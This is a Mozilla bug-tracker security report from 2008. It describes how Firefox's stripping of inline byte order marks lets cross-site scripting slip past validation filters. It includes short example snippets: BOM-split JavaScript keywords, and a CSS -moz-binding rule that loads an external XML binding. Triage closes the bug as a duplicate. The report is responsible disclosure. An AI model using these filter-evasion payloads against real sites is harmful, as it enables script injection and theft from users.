Closed Bug 446112 Opened 16 years ago Closed 16 years ago

Stripping in-line BOM is an XSS risk

Categories

(Core :: DOM: HTML Parser, defect)

defect
Not set
normal

RESOLVED DUPLICATE of bug 430740

People

(Reporter: dveditz, Unassigned)

Details

(Whiteboard: [sg:dupe 430740])

Attachments

(1 file)

This is much like JavaScript bug 430740 but affects HTML/CSS parsing. security@m.o. received the following from Chris Weber of Casaba Security:

July 17, 2008

Platform: Windows XP SP3 and SP2
Product: Firefox 3.0.1
Issue Type: attack technique for filter bypass and evasion which enables cross-site scripting
Exploitability: Easy
Remote: Yes

Here's an attack that leverages a vulnerability in the way Firefox handles Unicode Byte Order Marks U+FEFF and U+FFFE in the javascript interpreter.  The Unicode spec and FAQ at http://unicode.org/faq/utf_bom.html calls for implementations to treat a BOM in the middle of a file as ZWNBS.  The best behavior would be to make the ZWNBS a part of the string, which would have the effect of defusing any attack exploiting this technique.

"Q: What should I do with U+FEFF in the middle of a file?
A: In the absence of a protocol supporting its use as a BOM and when not at the beginning of a text stream, U+FEFF should normally not occur. For backwards compatibility it should be treated as ZERO WIDTH NON-BREAKING SPACE (ZWNBSP), and is then part of the content of the file or string."

Right now, we can insert a BOM in the middle of javascript method names, strings, and keywords such as 'var'.  This enables exploits where attackers can control fragments of javascript such as:

var x = "here's a U+FEFF in the middle of a string";
alert(x);
al[U+FEFF]ert("heres a U+FEFF in the middle of the alert() method name");
v[U+FEFF]ar y = "here's a U+FEFF in the middle of the var keyword";
alert(y);

We can also insert a BOM in the middle of a CSS string such as -moz-binding, enabling attacks which bypass validation filters.  The attack would look like:

p { -moz-bi[U+FEFF]nding: url(http://casabasecurity.com/stage/example_2.xml#redirect) }

I'll stop elaborating from here.  In short this issue allows for a lot of flexibility in bypassing validation or other logic attackers might want to bypass to enable attacks such as cross-site scripting.

Thanks,
Chris
Group: security
Blocks: xss
The JavaScript part is covered by bug 430740, this bug is to cover similar issues in HTML/XML/CSS parsing. Bug 430740 happens to Firefox 2.0, but the -moz-binding issue seems to be a regression in FF3.
No longer blocks: xss
Whiteboard: [sg:high]
Blocks: xss
I was fooled by running the testcase on Chris's site, which is not quite the one attached here (doesn't have the BOM in -moz-binding). When running on my own server I could only reproduce the JavaScript cases covered by bug 430740 and not any problems with BOM injected into HTML tags and attributes or style data.
Status: NEW → RESOLVED
Closed: 16 years ago
Resolution: --- → DUPLICATE
Whiteboard: [sg:high] → [sg:dupe 430740]
I didn't mean to fool you with regard to the CSS BOM injection, it was a mistake on my part.  As you said I can't reproduce that either right now.  Back to testing,
Chris
Didn't mean to imply it might have been intentional fooling, I fooled myself going too fast through my first triage pass. No harm done, and thanks again for reporting the JavaScript problem--it's a serious potential XSS risk.
Forgot to credit Chris in the advisory. Updated
http://www.mozilla.org/security/announce/2008/mfsa2008-43.html
Group: core-security